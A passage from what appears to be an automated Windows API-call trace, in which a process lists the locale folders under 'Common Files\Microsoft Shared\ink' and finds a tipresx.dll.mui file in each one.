cAlternateFileName="")) returned 0 [0046.392] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.392] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.392] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.392] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT", lpFilePart=0x0) returned 0x38 [0046.392] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.392] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.392] CoTaskMemFree (pv=0x4fe370) [0046.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.393] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT", lpFilePart=0x0) returned 0x38 [0046.393] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.393] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT", lpFilePart=0x0) returned 0x38 [0046.393] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\", lpFilePart=0x0) returned 0x39 [0046.393] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.428] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.428] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe608f802, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe627e9bb, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe62a4b18, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.429] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.429] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.429] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.429] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.429] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\tipresx.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\tipresx.dll.mui", lpFilePart=0x0) returned 0x48 [0046.429] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.429] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT", lpFilePart=0x0) returned 0x38 [0046.430] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\", lpFilePart=0x0) returned 0x39 [0046.430] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.430] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.431] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe608f802, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe627e9bb, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe62a4b18, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.431] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe608f802, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe627e9bb, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe62a4b18, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0046.431] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.431] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.431] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.431] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV", lpFilePart=0x0) returned 0x38 [0046.431] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.431] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.431] CoTaskMemFree (pv=0x4fe370) [0046.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.431] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV", lpFilePart=0x0) returned 0x38 [0046.431] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.431] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV", lpFilePart=0x0) returned 0x38 [0046.431] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\", lpFilePart=0x0) returned 0x39 [0046.432] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.432] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.432] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe721d8e0, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe7432bf6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe7458d53, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.432] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.432] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.432] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.432] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.433] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\tipresx.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\tipresx.dll.mui", lpFilePart=0x0) returned 0x48 [0046.433] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.433] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV", lpFilePart=0x0) returned 0x38 [0046.433] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\", lpFilePart=0x0) returned 0x39 [0046.433] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.433] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.433] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe721d8e0, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe7432bf6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe7458d53, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.433] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe721d8e0, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe7432bf6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe7458d53, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0046.433] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.433] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.434] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.434] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO", lpFilePart=0x0) returned 0x38 [0046.434] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.434] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.434] CoTaskMemFree (pv=0x4fe370) [0046.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.434] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO", lpFilePart=0x0) returned 0x38 [0046.434] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.434] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO", lpFilePart=0x0) returned 0x38 [0046.434] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\", lpFilePart=0x0) returned 0x39 [0046.434] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.435] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.435] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xead074bc, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xeaef6675, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xeaef6675, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.435] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.435] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.435] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.435] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.435] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\tipresx.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\tipresx.dll.mui", lpFilePart=0x0) returned 0x48 [0046.435] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.435] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO", lpFilePart=0x0) returned 0x38 [0046.435] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\", lpFilePart=0x0) returned 0x39 [0046.435] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.436] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.436] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xead074bc, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xeaef6675, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xeaef6675, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.436] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xead074bc, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xeaef6675, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xeaef6675, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0046.436] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.436] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.436] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.436] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL", lpFilePart=0x0) returned 0x38 [0046.436] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.436] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.436] CoTaskMemFree (pv=0x4fe370) [0046.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.437] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL", lpFilePart=0x0) returned 0x38 [0046.437] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.437] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL", lpFilePart=0x0) returned 0x38 [0046.437] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\", lpFilePart=0x0) returned 0x39 [0046.437] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.437] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.437] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4fe5f52, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe52213c5, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe5247522, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", 